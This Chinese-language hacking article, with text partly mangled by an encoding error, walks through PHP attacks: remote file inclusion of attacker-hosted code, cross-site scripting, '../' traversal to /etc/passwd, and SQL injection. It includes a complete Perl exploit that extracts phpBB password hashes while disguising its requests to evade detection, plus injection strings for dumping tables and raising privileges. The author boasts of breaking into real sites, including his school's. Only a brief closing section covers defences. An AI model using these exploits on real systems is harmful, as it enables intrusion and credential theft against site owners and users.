從現(xiàn)在的網(wǎng)絡(luò)安全來(lái)看,大家最關(guān)注和接觸最多的WEB頁(yè)面漏洞應(yīng)該是ASP了,在這方面,小竹是專(zhuān)家,我沒(méi)發(fā)言權(quán).然而在PHP方面來(lái)看,也同樣存在很?chē)?yán)重的安全問(wèn)題,但是這方面的文章卻不多.在這里,就跟大家來(lái)稍微的討論一下PHP頁(yè)面的相關(guān)漏洞吧.我對(duì)目前常見(jiàn)的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當(dāng)然,至于COOKIE 欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多.那么,我們就一個(gè)一個(gè)來(lái)分析一下怎樣利用這些漏洞吧!首先,我們來(lái)討論包含文件漏洞.這個(gè)漏洞應(yīng)該說(shuō)是PHP獨(dú)有的吧.這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令.我們來(lái)看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼:<?phpinclude($include.'/xxx.php');?>在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過(guò)自己構(gòu)造一個(gè)路徑來(lái)達(dá)到攻擊的目的.比方說(shuō)我們提交:a.php? include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來(lái)攻擊的代碼了.我們可以在 b.php中寫(xiě)入類(lèi)似于:passthru('/bin/ls /etc');的代碼.這樣,就可以執(zhí)行一些有目的的攻擊了.(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問(wèn)題了.相關(guān)詳情可以去看< <如何對(duì)PHP程序中的常見(jiàn)漏洞進(jìn)行攻擊>>).在這個(gè)漏洞方面,出狀況的很多,比方說(shuō):PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們?cè)賮?lái)看一下腳本命令執(zhí)行漏洞.這是由于對(duì)用戶(hù)提交的URI參數(shù)缺少充分過(guò)濾，提交包含惡意HTML代碼的數(shù)據(jù)，可導(dǎo)致觸發(fā)跨站腳本攻擊，可能獲得目標(biāo)用戶(hù)的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁(yè)面對(duì)PHPSESSID缺少充分的過(guò)濾,我們可以通過(guò)這樣的代碼來(lái)達(dá)到攻擊的目的:http://web/index.php?PHPSESSID='><script>...</script>在script里面我們可以構(gòu)造函數(shù)來(lái)獲得用戶(hù)的一些敏感信息.在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來(lái)看看文件泄露漏洞了.這種漏洞是由于對(duì)用戶(hù)提交參數(shù)缺少充分過(guò)濾，遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來(lái)做例子.在phpMyAdmin中,export.php頁(yè)面沒(méi)有對(duì)用戶(hù)提交的'what'參數(shù)進(jìn)行充分過(guò)濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù)，便可繞過(guò)WEB ROOT限制，以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說(shuō)打入這樣一個(gè)地址:export.php?what=../../../../../.. /etc/passwd%00 就可以達(dá)到文件泄露的目的了.在這方面相對(duì)多一點(diǎn),有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時(shí)在asp頁(yè)面中用SQL注入有多么爽,以前還要手動(dòng)注入,一直到小竹悟出'SQL注入密笈'(嘿嘿),然后再開(kāi)做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國(guó)頻道等大型網(wǎng)站找出漏洞.(這些廢話不多說(shuō)了,有點(diǎn)跑題了...).還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過(guò)稍微注意一下用的幾個(gè)函數(shù)就好了.將asc改成 ASCII,len改成LENGTH,其他函數(shù)基本不變了.其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說(shuō)樹(shù)大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說(shuō)它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了.PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來(lái),大概也有十來(lái)個(gè)樣子吧.這也一直導(dǎo)致,一部分人在研究php漏洞的時(shí)候都會(huì)拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會(huì)越來(lái)越好.好了,我們還是來(lái)分析一下漏洞產(chǎn)生的原因吧.拿viewtopic.php頁(yè)面來(lái)說(shuō),由于在調(diào)用viewtopic.php時(shí)，直接從GET請(qǐng)求中獲得 'topic_id'并傳遞給SQL查詢(xún)命令,而并沒(méi)有進(jìn)行一些過(guò)濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼，獲得此密碼信息可以用于自動(dòng)登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會(huì)有人想去暴力破解吧,除非有特別重要的原因).先看一下相關(guān)源代碼:# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )# {# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# }# else if ( isset($HTTP_GET_VARS['topic']) )# {# $topic_id = intval($HTTP_GET_VARS['topic']);# }從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢(xún)代碼像下面的這個(gè)樣子(如果你還沒(méi)看過(guò)PHPBB源代碼的話,建議你看了再對(duì)著這里來(lái)看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4).

# $sql = 'select p.post_id# FROM ' . POSTS_TABLE . ' p, ' . SESSIONS_TABLE . ' s, ' . USERS_TABLE . ' u # where s.session_id = '$session_id'# AND u.user_id = s.session_user_id# AND p.topic_id = $topic_id# AND p.post_time >= u.user_lastvisit# ORDER BY p.post_time ASC# LIMIT 1';

Rick提供了下面的這斷測(cè)試代碼:

use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4'; # mysql4 or pgsqlprint 'Trying to get password hash for uid $uid server $remote dbtype: $dbtypen';$p = '';for($index=1; $index<=32; $index++) {$socket = IO::Socket::INET->new(PeerAddr => $remote,PeerPort => $port,Proto => 'tcp',Type => SOCK_STREAM)or die 'Couldnt connect to $remote:$port :$@n';$str = 'GET $view_topic' . '?sid=1&topic_id=-1' . random_encode(make_dbsql()) . '&view=newest' . ' HTTP/1.0nn'; print $socket $str;print $socket 'Cookie: phpBB2mysql_sid=1n'; # replace this for pgsql or remove itprint $socket 'Host: $remotenn';while ($answer = <$socket>) {if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=<num>#<num> {$p .= chr ();}}close($socket);}print 'nMD5 Hash for uid $uid is $pn';# random encode str. helps avoid detectionsub random_encode {$str = shift;$ret = '';for($i=0; $i<length($str); $i++) {$c = substr($str,$i,1);$j = rand length($str) * 1000;if (int($j) % 2 || $c eq ' ') {$ret .= '%' . sprintf('%x',ord($c));} else {$ret .= $c;}}return $ret;}sub make_dbsql {if ($dbtype eq 'mysql4') {return ' union select ord(substring(user_password,' . $index . ',1)) from phpbb_users where user_id=$uid/*' ;} elsif ($dbtype eq 'pgsql') {return '; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false';} else {return '';}}

這斷代碼,我就不多做解釋了.作用是獲得HASH值.看到這里,大家可能有點(diǎn)疑問(wèn),為什么我前面講的那些改的函數(shù)怎么沒(méi)有用到,我講出來(lái)不怕大家笑話:其實(shí)網(wǎng)上很多站點(diǎn)有些頁(yè)面的查詢(xún)語(yǔ)句看起來(lái)會(huì)是這樣:display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc不要笑,這是真的,我還靠這個(gè)進(jìn)過(guò)幾個(gè)大型網(wǎng)站.至于哪一些,不好講出來(lái),不過(guò)我們學(xué)校的網(wǎng)站,我就是靠這個(gè)進(jìn)后臺(tái)的(希望學(xué)校網(wǎng)絡(luò)中心的看不到這篇文章,^_^).把前面那函數(shù)用上吧.不然你只有改人家的密碼了哦!!!差點(diǎn)忘了一點(diǎn),在SQL注入的時(shí)候,PHP與ASP有所不同,mysql對(duì)sql語(yǔ)句的運(yùn)用沒(méi)有mssql靈活,因此,很多在mssql上可以用的查詢(xún)語(yǔ)句在mysql數(shù)據(jù)庫(kù)中都不能奏效了. 一般我們常見(jiàn)的注入語(yǔ)句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進(jìn)一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt 中這樣可以將數(shù)據(jù)庫(kù)數(shù)據(jù)導(dǎo)出為文件,然后可以查看.或是這樣:mode=',user_level='4這個(gè)語(yǔ)句一般用在修改資料時(shí),假設(shè)頁(yè)面存在漏洞的話,就可以達(dá)到提升權(quán)限的做用.其它的如' OR 1=1 -- 或者:1' or 1='1則跟asp差不多.這里不多講了.在php里面,SQL注入看來(lái)還是漏洞之首啊,有太多的頁(yè)面存在這個(gè)問(wèn)題了.其實(shí)大家可以看出來(lái),上面那些分類(lèi)歸根結(jié)底只有一個(gè)原因:提交參數(shù)沒(méi)過(guò)濾或是過(guò)濾不夠嚴(yán)謹(jǐn).黑客防線向來(lái)有攻有守.這里,就大致講一下防范的方法吧.

首先,我個(gè)人認(rèn)為最重要的一點(diǎn)是將magic_quotes_gpc高為ON,它的作用是將單引號(hào),雙引號(hào),反斜線,和空字符轉(zhuǎn)換為含有反斜線的字符,如 select * from admin where username='$username' and password='$password'語(yǔ)句,攻擊者想用1' or 1='1跳過(guò)驗(yàn)證,但是,那些字符串將被轉(zhuǎn)換成這樣:select * from admin where username='a' and password='1' or 1='1'從而達(dá)到阻止注入的目的,事實(shí)也就是自動(dòng)進(jìn)行了addslashes()操作.再不行的話,自己定義函數(shù)處理吧.現(xiàn)在看來(lái),那些搞PHP注入的人也比較郁悶,因?yàn)閙yslq4以下版本不支持子語(yǔ)句,而新版本的mysql又會(huì)將magic_quotes_gpc選項(xiàng)默認(rèn)為開(kāi).解決包含文件漏洞用的方法就是:要求程序員包含文件里的參數(shù)盡量不要使用變量，如果使用變量，就一定要嚴(yán)格檢查要包含的文件名，絕對(duì)不能由用戶(hù)任意指定,建議設(shè)global_variables為off。如前面文件打開(kāi)中限制PHP操作路徑是一個(gè)必要的選項(xiàng)。另外，如非特殊需要，一定要關(guān)閉PHP的遠(yuǎn)程文件打開(kāi)功能。修改php.ini文件：allow_url_fopen = Off(注:參見(jiàn)<<PHP安全問(wèn)題：遠(yuǎn)程溢出、DoS、safe_mode繞過(guò)漏洞>>).